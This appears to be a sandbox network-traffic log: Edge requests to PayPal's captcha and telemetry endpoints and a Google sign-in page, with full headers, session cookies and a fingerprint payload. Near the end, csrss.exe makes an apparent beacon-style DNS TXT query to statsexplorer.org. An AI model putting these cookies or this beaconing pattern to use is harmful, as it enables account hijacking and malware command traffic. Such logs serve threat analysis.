MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/backbone-0.9.2.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/auth/validatecaptcha
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:59 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-e846"
expires: Tue, 29 Oct 2024 06:49:59 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: a1265594e1716
server: ECAcc (ama/48C3)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000a1265594e1716-1e2c4a636d010284-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 15419
GET

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/dust-helpers-supplement.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/dust-helpers-supplement.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/auth/validatecaptcha
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Mon, 30 Oct 2023 06:49:59 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"651d83fd-118f"
expires: Tue, 29 Oct 2024 06:49:59 GMT
last-modified: Wed, 04 Oct 2023 15:25:49 GMT
paypal-debug-id: f9afeadfd1742
server: ECAcc (ama/48F7)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000f9afeadfd1742-b5d46d2648a529b9-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 1522
DNS

www.recaptcha.net

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.recaptcha.net

IN A

Response

www.recaptcha.net

IN A

142.250.179.163
GET

https://www.recaptcha.net/recaptcha/enterprise.js?onload=recaptchaEnterpriseCallback&render=explicit&hl=en

MicrosoftEdgeCP.exe

Remote address:

142.250.179.163:443

Request

GET /recaptcha/enterprise.js?onload=recaptchaEnterpriseCallback&render=explicit&hl=en HTTP/2.0
host: www.recaptcha.net
accept: application/javascript, */*;q=0.8
referer: https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/recaptcha/recaptcha_v2.html?siteKey=6LeZ6egUAAAAAGwL8CjkDE8dcSw2DtvuVpdwTkwG&locale.x=en_US&country.x=US&checkConnectionTimeout=10000&reCaptchaEnterpriseEnabled=true
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: text/javascript; charset=UTF-8
expires: Mon, 30 Oct 2023 06:49:55 GMT
date: Mon, 30 Oct 2023 06:49:55 GMT
cache-control: private, max-age=300
cross-origin-resource-policy: cross-origin
content-encoding: gzip
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
content-security-policy: frame-ancestors 'self'
x-xss-protection: 1; mode=block
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://www.recaptcha.net/recaptcha/enterprise/anchor?ar=1&k=6LeZ6egUAAAAAGwL8CjkDE8dcSw2DtvuVpdwTkwG&co=aHR0cHM6Ly93d3cucGF5cGFsb2JqZWN0cy5jb206NDQz&hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2&theme=light&size=normal&cb=qxzlq56mq2h

MicrosoftEdgeCP.exe

Remote address:

142.250.179.163:443

Request

GET /recaptcha/enterprise/anchor?ar=1&k=6LeZ6egUAAAAAGwL8CjkDE8dcSw2DtvuVpdwTkwG&co=aHR0cHM6Ly93d3cucGF5cGFsb2JqZWN0cy5jb206NDQz&hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2&theme=light&size=normal&cb=qxzlq56mq2h HTTP/2.0
host: www.recaptcha.net
accept: text/html, application/xhtml+xml, image/jxr, */*
referer: https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/recaptcha/recaptcha_v2.html?siteKey=6LeZ6egUAAAAAGwL8CjkDE8dcSw2DtvuVpdwTkwG&locale.x=en_US&country.x=US&checkConnectionTimeout=10000&reCaptchaEnterpriseEnabled=true
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
cross-origin-resource-policy: cross-origin
cross-origin-embedder-policy: require-corp
report-to: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 30 Oct 2023 06:49:56 GMT
content-security-policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://www.recaptcha.net/recaptcha/enterprise/bframe?hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2&k=6LeZ6egUAAAAAGwL8CjkDE8dcSw2DtvuVpdwTkwG

MicrosoftEdgeCP.exe

Remote address:

142.250.179.163:443

Request

GET /recaptcha/enterprise/bframe?hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2&k=6LeZ6egUAAAAAGwL8CjkDE8dcSw2DtvuVpdwTkwG HTTP/2.0
host: www.recaptcha.net
accept: text/html, application/xhtml+xml, image/jxr, */*
referer: https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/recaptcha/recaptcha_v2.html?siteKey=6LeZ6egUAAAAAGwL8CjkDE8dcSw2DtvuVpdwTkwG&locale.x=en_US&country.x=US&checkConnectionTimeout=10000&reCaptchaEnterpriseEnabled=true
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
cross-origin-resource-policy: cross-origin
cross-origin-embedder-policy: require-corp
report-to: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 30 Oct 2023 06:50:09 GMT
content-security-policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://i.ytimg.com/generate_204

MicrosoftEdgeCP.exe

Remote address:

142.251.39.118:443

Request

GET /generate_204 HTTP/2.0
host: i.ytimg.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.youtube.com/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 204

content-length: 0
cross-origin-resource-policy: cross-origin
date: Mon, 30 Oct 2023 06:49:55 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

IN A

Response

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

IN CNAME

siteintercept.qprod2.net

siteintercept.qprod2.net

IN CNAME

prodlb.siteintercept.qualtrics.com.cdn.cloudflare.net

prodlb.siteintercept.qualtrics.com.cdn.cloudflare.net

IN A

104.17.209.240

prodlb.siteintercept.qualtrics.com.cdn.cloudflare.net

IN A

104.17.208.240
DNS

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

IN A
POST

https://zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com/WRSiteInterceptEngine/Targeting.php?Q_ZoneID=ZN_1yNnlIufRcT75CB&Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs

MicrosoftEdgeCP.exe

Remote address:

104.17.209.240:443

Request

POST /WRSiteInterceptEngine/Targeting.php?Q_ZoneID=ZN_1yNnlIufRcT75CB&Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs HTTP/2.0
host: zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com
accept: */*
origin: https://www.paypal.com
referer: https://www.paypal.com/auth/validatecaptcha
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: application/x-www-form-urlencoded
accept-encoding: gzip, deflate, br
content-length: 67
cache-control: no-cache

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:49:58 GMT
content-type: application/json
cf-ray: 81e1b8a98d256642-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://www.paypal.com
cache-control: no-store, no-cache, must-revalidate, max-age=0
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-credentials: true
content-security-policy-report-only: frame-ancestors 'self' *.qualtrics.com *.my.salesforce.com *.visualforce.com *.visual.force.com *.lightning.force.com; report-uri https://sjc1.qualtrics.com/csp-report
permissions-policy: camera=(), geolocation=(), microphone=()
referrer-policy: strict-origin-when-cross-origin
timing-allow-origin: *
trace-id: 805249f89b3433e3
x-content-type-options: nosniff
vary: Accept-Encoding
server: cloudflare
content-encoding: br
DNS

t.paypal.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

t.paypal.com

IN A

Response

t.paypal.com

IN CNAME

t.glb.paypal.com

t.glb.paypal.com

IN CNAME

cs1150.wpc.betacdn.net

cs1150.wpc.betacdn.net

IN A

192.229.221.25
GET

https://t.paypal.com/ts?v=1.8.7&t=1698648598408&g=0&e=err&page=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&pgrp=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&comp=authchallengenodeweb&erpg=Script%20error&error_type=WINDOW_ONERROR&error_source=-%200%3A0

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /ts?v=1.8.7&t=1698648598408&g=0&e=err&page=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&pgrp=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&comp=authchallengenodeweb&erpg=Script%20error&error_type=WINDOW_ONERROR&error_source=-%200%3A0 HTTP/2.0
host: t.paypal.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.paypal.com/auth/validatecaptcha
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODU5OTY3OCIsImwiOiIwIiwibSI6IjAifQ; TLTSID=62544276781500915456071760049843; enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=cspreportnodeweb; l7_az=dcg13.slc; ts=vreXpYrS%3D1793342999%26vteXpYrS%3D1698650399%26vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222%26vtyp%3Dnew; ts_c=vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222

Response

HTTP/2.0 200

cache-control: max-age=0, no-cache, no-store, must-revalidate
content-type: image/gif
correlation-id: e27bba80bb3a3
date: Mon, 30 Oct 2023 06:50:00 GMT
expires: Mon, 30 Oct 2023 06:50:00 GMT
p3p: CP="CAO IND OUR SAM UNI STA COR COM"
paypal-debug-id: e27bba80bb3a3
pragma: no-cache
server: ECAcc (frc/4D0A)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: ts=vreXpYrS%3D1793256600%26vteXpYrS%3D1698650400%26vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222%26vtyp%3Dnew;Expires=Thu, 29 Oct 2026 06:50:00 GMT;domain=.paypal.com;path=/;secure;HttpOnly;
set-cookie: ts_c=vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222;Expires=Thu, 29 Oct 2026 06:50:00 GMT;domain=.paypal.com;path=/;secure;
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-0000000000000000000e27bba80bb3a3-5871a5d2c8af8d8a-01
vary: Accept-Encoding
GET

https://t.paypal.com/ts?v=1.8.7&t=1698648599932&g=0&page=main%3Aauthchallenge%3A%3Aauth%3Avalidatecaptcha&pgst=1698648592937&calc=080b734a5b400&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=26b33010f73b4228ba980976cd412631&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&view=%7B%22t10%22%3A0%2C%22t11%22%3A5394%2C%22nt%22%3A%22manual%22%7D&ads_client_data=Navigator(appCodeName%3DMozilla%7CappName%3DNetscape%7CappVersion%3D5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7CuserAgent%3DMozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7Cwebdriverfalse%7CdeviceMemoryundefined%7Cgeolocation(Available)%7Clanguage%3Den-US%7ConLine%3Dtrue%7Cplatform%3DWin32%7Cproduct%3DGecko)%7CHistory(2)%7Cscreen(1280%2C720%2C1280%2C680%2C24%2C24)%7Cwindow(Width%3D800%7Cheight%3D556%7CmozRTCPeerConnection%3Dundefined%7CChrome%3D%5Bobject%20Object%5D%7CcallPhantom%3Dundefined%7C_phantom%3Dundefined%7Cstr%3Dundefined%7Clength%3D1%7CdevicePixelRatio%3D1)%7CloginPresent(false)%7CloginTitle()%7Creferrer(https%3A%2F%2Fwww.paypal.com%2Fsignin)%7Cplugins%3A(Shockwave%20Flash%20%7C%20Flash.ocx%20%7C%20Shockwave%20Flash%2025.0%20r0%20%7C%20)(Edge%20PDF%20Viewer%20%7C%20%20%7C%20Portable%20Document%20Format%20%7C%20)%7ChardwareConcurrency(2)%7CmozLockOrientation(undefined)%7CmozUnlockOrientation(undefined)%7CmozOrientation(undefined)%7CError(TypeError%3A%20Unable%20to%20get%20property%20'0'%20of%20undefined%20or%20null%20reference)&res=%7B%7D&e=pf

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /ts?v=1.8.7&t=1698648599932&g=0&page=main%3Aauthchallenge%3A%3Aauth%3Avalidatecaptcha&pgst=1698648592937&calc=080b734a5b400&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=26b33010f73b4228ba980976cd412631&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&view=%7B%22t10%22%3A0%2C%22t11%22%3A5394%2C%22nt%22%3A%22manual%22%7D&ads_client_data=Navigator(appCodeName%3DMozilla%7CappName%3DNetscape%7CappVersion%3D5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7CuserAgent%3DMozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7Cwebdriverfalse%7CdeviceMemoryundefined%7Cgeolocation(Available)%7Clanguage%3Den-US%7ConLine%3Dtrue%7Cplatform%3DWin32%7Cproduct%3DGecko)%7CHistory(2)%7Cscreen(1280%2C720%2C1280%2C680%2C24%2C24)%7Cwindow(Width%3D800%7Cheight%3D556%7CmozRTCPeerConnection%3Dundefined%7CChrome%3D%5Bobject%20Object%5D%7CcallPhantom%3Dundefined%7C_phantom%3Dundefined%7Cstr%3Dundefined%7Clength%3D1%7CdevicePixelRatio%3D1)%7CloginPresent(false)%7CloginTitle()%7Creferrer(https%3A%2F%2Fwww.paypal.com%2Fsignin)%7Cplugins%3A(Shockwave%20Flash%20%7C%20Flash.ocx%20%7C%20Shockwave%20Flash%2025.0%20r0%20%7C%20)(Edge%20PDF%20Viewer%20%7C%20%20%7C%20Portable%20Document%20Format%20%7C%20)%7ChardwareConcurrency(2)%7CmozLockOrientation(undefined)%7CmozUnlockOrientation(undefined)%7CmozOrientation(undefined)%7CError(TypeError%3A%20Unable%20to%20get%20property%20'0'%20of%20undefined%20or%20null%20reference)&res=%7B%7D&e=pf HTTP/2.0
host: t.paypal.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.paypal.com/auth/validatecaptcha
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODU5OTY3OCIsImwiOiIwIiwibSI6IjAifQ; TLTSID=62544276781500915456071760049843; enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=cspreportnodeweb; l7_az=dcg13.slc; ts=vreXpYrS%3D1793256600%26vteXpYrS%3D1698650400%26vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222%26vtyp%3Dnew; ts_c=vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222

Response

HTTP/2.0 200

cache-control: max-age=0, no-cache, no-store, must-revalidate
content-type: image/gif
correlation-id: 2310b1db36912
date: Mon, 30 Oct 2023 06:50:01 GMT
expires: Mon, 30 Oct 2023 06:50:01 GMT
p3p: CP="CAO IND OUR SAM UNI STA COR COM"
paypal-debug-id: 2310b1db36912
pragma: no-cache
server: ECAcc (frc/4CFB)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: ts=vreXpYrS%3D1793256601%26vteXpYrS%3D1698650401%26vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222%26vtyp%3Dnew;Expires=Thu, 29 Oct 2026 06:50:01 GMT;domain=.paypal.com;path=/;secure;HttpOnly;
set-cookie: ts_c=vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222;Expires=Thu, 29 Oct 2026 06:50:01 GMT;domain=.paypal.com;path=/;secure;
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-00000000000000000002310b1db36912-e51e26794469c22d-01
vary: Accept-Encoding
GET

https://t.paypal.com/ts?v=1.8.7&t=1698648609453&g=0&pgrp=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&page=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&pgst=1698648592937&calc=080b734a5b400&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=26b33010f73b4228ba980976cd412631&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&e=im&imsrc=setup&view=%7B%22t10%22%3A474%2C%22t11%22%3A18412%2C%22tcp%22%3A1946%2C%22nt%22%3A%22navigate%22%2C%22bt%22%3A11568%7D&ru=https%3A%2F%2Fwww.paypal.com%2Fsignin&cd=24&sw=1280&sh=720&dw=1280&dh=720&bw=800&bh=556&ce=1&t1=474&t1c=0&t1d=0&t1s=0&t2=329&t3=20&t4d=6532&t4=6557&t4e=25&tt=7359&rdc=0&res=%7B%7D&rtt=326

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /ts?v=1.8.7&t=1698648609453&g=0&pgrp=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&page=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&pgst=1698648592937&calc=080b734a5b400&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=26b33010f73b4228ba980976cd412631&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&e=im&imsrc=setup&view=%7B%22t10%22%3A474%2C%22t11%22%3A18412%2C%22tcp%22%3A1946%2C%22nt%22%3A%22navigate%22%2C%22bt%22%3A11568%7D&ru=https%3A%2F%2Fwww.paypal.com%2Fsignin&cd=24&sw=1280&sh=720&dw=1280&dh=720&bw=800&bh=556&ce=1&t1=474&t1c=0&t1d=0&t1s=0&t2=329&t3=20&t4d=6532&t4=6557&t4e=25&tt=7359&rdc=0&res=%7B%7D&rtt=326 HTTP/2.0
host: t.paypal.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.paypal.com/auth/validatecaptcha
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODU5OTY3OCIsImwiOiIwIiwibSI6IjAifQ; TLTSID=62544276781500915456071760049843; enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=cspreportnodeweb; l7_az=dcg13.slc; ts=vreXpYrS%3D1793256601%26vteXpYrS%3D1698650401%26vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222%26vtyp%3Dnew; ts_c=vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222

Response

HTTP/2.0 200

cache-control: max-age=0, no-cache, no-store, must-revalidate
content-type: image/gif
correlation-id: 1d362833a37a3
date: Mon, 30 Oct 2023 06:50:11 GMT
expires: Mon, 30 Oct 2023 06:50:11 GMT
p3p: CP="CAO IND OUR SAM UNI STA COR COM"
paypal-debug-id: 1d362833a37a3
pragma: no-cache
server: ECAcc (frc/4CC7)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: ts=vreXpYrS%3D1793256611%26vteXpYrS%3D1698650411%26vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222%26vtyp%3Dnew;Expires=Thu, 29 Oct 2026 06:50:11 GMT;domain=.paypal.com;path=/;secure;HttpOnly;
set-cookie: ts_c=vr%3D7f58922718b0ad1038a36b77fae01223%26vt%3D7f58922718b0ad1038a36b77fae01222;Expires=Thu, 29 Oct 2026 06:50:11 GMT;domain=.paypal.com;path=/;secure;
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-00000000000000000001d362833a37a3-067a8c26ede74468-01
vary: Accept-Encoding
GET

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif

MicrosoftEdgeCP.exe

Remote address:

142.250.179.141:443

Request

GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:H0pAxJMwCoFHeYuqadS7exfWb6MgrA:RzlhkCIkNOEMbV-v

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
x-frame-options: DENY
set-cookie: __Host-GAPS=1:yW50zpu4LJhhRq_Li-xBFIOW179wuQ:ciXowc1GSekqheMk; Expires=Wed, 29-Oct-2025 06:50:06 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/
x-ua-compatible: IE=edge
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 30 Oct 2023 06:50:06 GMT
strict-transport-security: max-age=31536000; includeSubDomains
content-security-policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
report-to: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
cross-origin-resource-policy: same-site
cross-origin-opener-policy-report-only: same-origin; report-to="AccountsSignInUi"
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://i.ytimg.com/generate_204

MicrosoftEdgeCP.exe

Remote address:

142.251.39.118:443

Request

GET /generate_204 HTTP/2.0
host: i.ytimg.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.youtube.com/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 204

content-length: 0
cross-origin-resource-policy: cross-origin
date: Mon, 30 Oct 2023 06:50:10 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

7d9c5bb8-f228-41b5-97ed-124b5722e850.uuid.statsexplorer.org

csrss.exe

Remote address:

8.8.8.8:53

Request

7d9c5bb8-f228-41b5-97ed-124b5722e850.uuid.statsexplorer.org

IN TXT

Response
DNS

98.142.81.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

98.142.81.104.in-addr.arpa

IN PTR

Response

98.142.81.104.in-addr.arpa

IN PTR

a104-81-142-98deploystaticakamaitechnologiescom
DNS

www.microsoft.com

MicrosoftEdge.exe

Remote address:

